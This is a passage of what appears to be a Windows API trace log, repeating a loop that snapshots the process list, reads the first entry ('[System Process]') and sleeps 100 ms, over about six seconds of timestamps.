pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0299.349] Sleep (dwMilliseconds=0x64) [0299.366] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x22a0 [0299.382] Process32First (in: hSnapshot=0x22a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0299.466] Sleep (dwMilliseconds=0x64) [0299.468] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x22a0 [0299.482] Process32First (in: hSnapshot=0x22a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0299.550] Sleep (dwMilliseconds=0x64) [0299.553] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x22a0 [0299.566] Process32First (in: hSnapshot=0x22a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0299.648] Sleep (dwMilliseconds=0x64) [0299.650] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x22a0 [0299.666] Process32First (in: hSnapshot=0x22a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0299.826] Sleep (dwMilliseconds=0x64) [0299.827] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x22a0 [0299.854] Process32First (in: hSnapshot=0x22a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0299.952] Sleep (dwMilliseconds=0x64) [0299.954] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x22a0 [0299.970] Process32First (in: hSnapshot=0x22a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0300.073] Sleep (dwMilliseconds=0x64) [0300.076] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x22a0 [0300.091] Process32First (in: hSnapshot=0x22a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0300.225] Sleep (dwMilliseconds=0x64) [0300.227] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x22a0 [0300.241] Process32First (in: hSnapshot=0x22a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0300.309] Sleep (dwMilliseconds=0x64) [0300.312] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x22a0 [0300.326] Process32First (in: hSnapshot=0x22a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0300.405] Sleep (dwMilliseconds=0x64) [0300.407] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x22a0 [0300.420] Process32First (in: hSnapshot=0x22a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0300.507] Sleep (dwMilliseconds=0x64) [0300.508] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x22a0 [0300.528] Process32First (in: hSnapshot=0x22a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0300.622] Sleep (dwMilliseconds=0x64) [0300.624] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x22a0 [0300.640] Process32First (in: hSnapshot=0x22a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0300.710] Sleep (dwMilliseconds=0x64) [0300.711] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x22a0 [0300.723] Process32First (in: hSnapshot=0x22a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0300.789] Sleep (dwMilliseconds=0x64) [0300.792] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x22a0 [0300.804] Process32First (in: hSnapshot=0x22a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0300.883] Sleep (dwMilliseconds=0x64) [0300.885] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x22a0 [0300.897] Process32First (in: hSnapshot=0x22a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0301.052] Sleep (dwMilliseconds=0x64) [0301.054] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x22a0 [0301.075] Process32First (in: hSnapshot=0x22a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0301.153] Sleep (dwMilliseconds=0x64) [0301.155] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x22a0 [0301.169] Process32First (in: hSnapshot=0x22a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0301.305] Sleep (dwMilliseconds=0x64) [0301.308] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x22a0 [0301.324] Process32First (in: hSnapshot=0x22a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0301.424] Sleep (dwMilliseconds=0x64) [0301.427] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x22a0 [0301.445] Process32First (in: hSnapshot=0x22a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0301.550] Sleep (dwMilliseconds=0x64) [0301.553] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x22a0 [0301.569] Process32First (in: hSnapshot=0x22a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0301.665] Sleep (dwMilliseconds=0x64) [0301.666] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x22a0 [0301.683] Process32First (in: hSnapshot=0x22a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0301.773] Sleep (dwMilliseconds=0x64) [0301.776] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x22a0 [0301.793] Process32First (in: hSnapshot=0x22a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0301.887] Sleep (dwMilliseconds=0x64) [0301.891] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x22a0 [0301.904] Process32First (in: hSnapshot=0x22a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0301.990] Sleep (dwMilliseconds=0x64) [0301.994] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x22a0 [0302.006] Process32First (in: hSnapshot=0x22a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0302.103] Sleep (dwMilliseconds=0x64) [0302.105] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x22a0 [0302.120] Process32First (in: hSnapshot=0x22a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0302.219] Sleep (dwMilliseconds=0x64) [0302.221] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x22a0 [0302.234] Process32First (in: hSnapshot=0x22a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0302.318] Sleep (dwMilliseconds=0x64) [0302.320] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x22a0 [0302.336] Process32First (in: hSnapshot=0x22a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0302.415] Sleep (dwMilliseconds=0x64) [0302.417] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x22a0 [0302.428] Process32First (in: hSnapshot=0x22a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0302.510] Sleep (dwMilliseconds=0x64) [0302.512] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x22a0 [0302.523] Process32First (in: hSnapshot=0x22a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0302.595] Sleep (dwMilliseconds=0x64) [0302.598] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x22a0 [0302.613] Process32First (in: hSnapshot=0x22a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0302.682] Sleep (dwMilliseconds=0x64) [0302.683] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x22a0 [0302.698] Process32First (in: hSnapshot=0x22a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0302.773] Sleep (dwMilliseconds=0x64) [0302.775] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x22a0 [0302.788] Process32First (in: hSnapshot=0x22a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0302.875] Sleep (dwMilliseconds=0x64) [0302.877] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x22a0 [0302.890] Process32First (in: hSnapshot=0x22a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0302.964] Sleep (dwMilliseconds=0x64) [0302.966] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x22a0 [0302.979] Process32First (in: hSnapshot=0x22a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0303.047] Sleep (dwMilliseconds=0x64) [0303.048] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x22a0 [0303.075] Process32First (in: hSnapshot=0x22a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0303.148] Sleep (dwMilliseconds=0x64) [0303.150] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x22a0 [0303.162] Process32First (in: hSnapshot=0x22a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0303.253] Sleep (dwMilliseconds=0x64) [0303.255] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x22a0 [0303.267] Process32First (in: hSnapshot=0x22a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0303.381] Sleep (dwMilliseconds=0x64) [0303.383] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x22a0 [0303.400] Process32First (in: hSnapshot=0x22a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0303.489] Sleep (dwMilliseconds=0x64) [0303.491] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x22a0 [0303.507] Process32First (in: hSnapshot=0x22a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0303.599] Sleep (dwMilliseconds=0x64) [0303.602] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x22a0 [0303.619] Process32First (in: hSnapshot=0x22a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0303.707] Sleep (dwMilliseconds=0x64) [0303.710] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x22a0 [0303.726] Process32First (in: hSnapshot=0x22a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0303.842] Sleep (dwMilliseconds=0x64) [0303.844] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x22a0 [0303.868] Process32First (in: hSnapshot=0x22a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0303.960] Sleep (dwMilliseconds=0x64) [0303.962] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x22a0 [0303.979] Process32First (in: hSnapshot=0x22a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0304.082] Sleep (dwMilliseconds=0x64) [0304.095] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x22a0 [0304.129] Process32First (in: hSnapshot=0x22a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0304.221] Sleep (dwMilliseconds=0x64) [0304.224] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x22a0 [0304.237] Process32First (in: hSnapshot=0x22a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0304.309] Sleep (dwMilliseconds=0x64) [0304.312] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x22a0 [0304.326] Process32First (in: hSnapshot=0x22a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0304.404] Sleep (dwMilliseconds=0x64) [0304.407] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x22a0 [0304.421] Process32First (in: hSnapshot=0x22a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0304.546] Sleep (dwMilliseconds=0x64) [0304.551] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x22a0 [0304.564] Process32First (in: hSnapshot=0x22a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0304.654] Sleep (dwMilliseconds=0x64) [0304.655] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x22a0 [0304.668] Process32First (in: hSnapshot=0x22a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0304.795] Sleep (dwMilliseconds=0x64) [0304.801] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x22a0 [0304.816] Process32First (in: hSnapshot=0x22a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0304.923] Sleep (dwMilliseconds=0x64) [0304.925] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x22a0 [0304.939] Process32First (in: hSnapshot=0x22a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0305.019] Sleep (dwMilliseconds=0x64) [0305.021] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x22a0 [0305.036] Process32First (in: hSnapshot=0x22a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0305.123] Sleep (dwMilliseconds=0x64) [0305.125] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x22a0 [0305.138] Process32First (in: hSnapshot=0x22a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0305.232] Sleep (dwMilliseconds=0x64) [0305.234] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x22a0 [0305.251] Process32First (in: hSnapshot=0x22a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0305.323] Sleep (dwMilliseconds=0x64) [0305.325] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x22a0 [0305.339] Process32First (in: hSnapshot=0x22a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0305.418] Sleep (dwMilliseconds=0x64) [0305.421] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x22a0 [0305.437] Process32First (in: hSnapshot=0x22a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0305.531] Sleep (dwMilliseconds=0x64) [0305.534] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x22a0 [0305.547] Process32First (in: hSnapshot=0x22a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0305.622] Sleep (dwMilliseconds=0x64) [0305.624] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x22a0 [0305.637] Process32First (in: hSnapshot=0x22a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0305.750] Sleep (dwMilliseconds=0x64) [0305.753] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x22a0 [0305.767] Process32First (in: hSnapshot=0x22a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0305.845] Sleep (dwMilliseconds=0x64) [0305.847] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x22a0 [0305.859] Process32First (in: hSnapshot=0x22a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0305.941] Sleep 